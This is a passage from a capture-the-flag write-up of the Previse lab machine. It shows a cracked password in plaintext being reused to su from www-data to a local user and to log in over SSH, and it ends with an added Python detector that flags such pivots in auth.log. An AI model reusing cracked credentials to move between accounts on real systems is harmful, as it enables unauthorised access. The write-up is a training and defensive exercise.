m4lwhere


I was able to crack the password hash for the m4lwhere user. While the credential is used for the web application, I will test it for password reuse, as the user is also a system user.

www-data@previse:/var/www/html$ su m4lwhere
password: ilovecody112235!
 
m4lwhere@previse:/var/www/html$ id
uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)

Password reuse confirmed.

SSH


┌──(kali㉿kali)-[~/…/htb/labs/previse/siteBackup]
└─$ ssh m4lwhere@$IP      
m4lwhere@10.10.11.104's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Wed Apr 12 12:51:19 UTC 2023
 
  System load:  0.0               Processes:           179
  Usage of /:   51.9% of 4.85GB   Users logged in:     0
  Memory usage: 39%               IP address for eth0: 10.10.11.104
  Swap usage:   0%
 
 
0 updates can be applied immediately.
 
 
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ whoami
m4lwhere
m4lwhere@previse:~$ hostname
previse
m4lwhere@previse:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.104  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:3246  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:3246  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:32:46  txqueuelen 1000  (Ethernet)
        RX packets 1948084  bytes 242671507 (242.6 MB)
        RX errors 0  dropped 31  overruns 0  frame 0
        TX packets 1616904  bytes 805664953 (805.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 15916  bytes 1341057 (1.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15916  bytes 1341057 (1.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral movement made to the m4lwhere user via SSH.
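
From the defender's side, the sequence above (a web service account running su to a local user, followed by a password-based SSH login as that same user) leaves a recognisable trail in auth.log. The following is an added detection example, not part of the original writeup. It assumes Ubuntu-style su and sshd log messages; the log lines, timestamps, source addresses and the service-account list are constructed for illustration.

```python
import re

# Constructed auth.log lines (assumed Ubuntu-style su/sshd messages); not from the page.
SAMPLE_LOG = """\
Apr 12 12:49:02 previse su[2211]: Successful su for m4lwhere by www-data
Apr 12 12:49:02 previse su[2211]: + /dev/pts/0 www-data:m4lwhere
Apr 12 12:51:19 previse sshd[2290]: Accepted password for m4lwhere from 192.0.2.10 port 50122 ssh2
Apr 12 13:05:40 previse su[2301]: FAILED su for root by www-data
Apr 12 13:10:11 previse sshd[2350]: Accepted publickey for backup from 192.0.2.20 port 40100 ssh2
"""

# Assumed list of accounts that should never start an interactive su.
SERVICE_ACCOUNTS = {"www-data", "nobody", "mysql"}

SU_RE = re.compile(r"su\[\d+\]: (Successful|FAILED) su for (\S+) by (\S+)")
SSH_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port \d+")


def find_service_account_pivots(log_text, service_accounts=SERVICE_ACCOUNTS):
    """Return alerts for su attempts made by service accounts, and for
    later password-based SSH logins as a user reached that way."""
    alerts = []
    pivoted = set()  # users a service account successfully su'd to
    for line in log_text.splitlines():
        m = SU_RE.search(line)
        if m:
            outcome, target, source = m.groups()
            if source in service_accounts:
                succeeded = outcome == "Successful"
                alerts.append(("su_from_service_account", source, target, succeeded))
                if succeeded:
                    pivoted.add(target)
            continue
        m = SSH_RE.search(line)
        if m:
            method, user, addr = m.groups()
            # Password auth for a pivoted user suggests the same credential was reused.
            if method == "password" and user in pivoted:
                alerts.append(("ssh_password_after_pivot", user, addr, True))
    return alerts


if __name__ == "__main__":
    for alert in find_service_account_pivots(SAMPLE_LOG):
        print(alert)
```

Failed attempts are reported as well, since any su invoked by a web service account indicates command execution under that account.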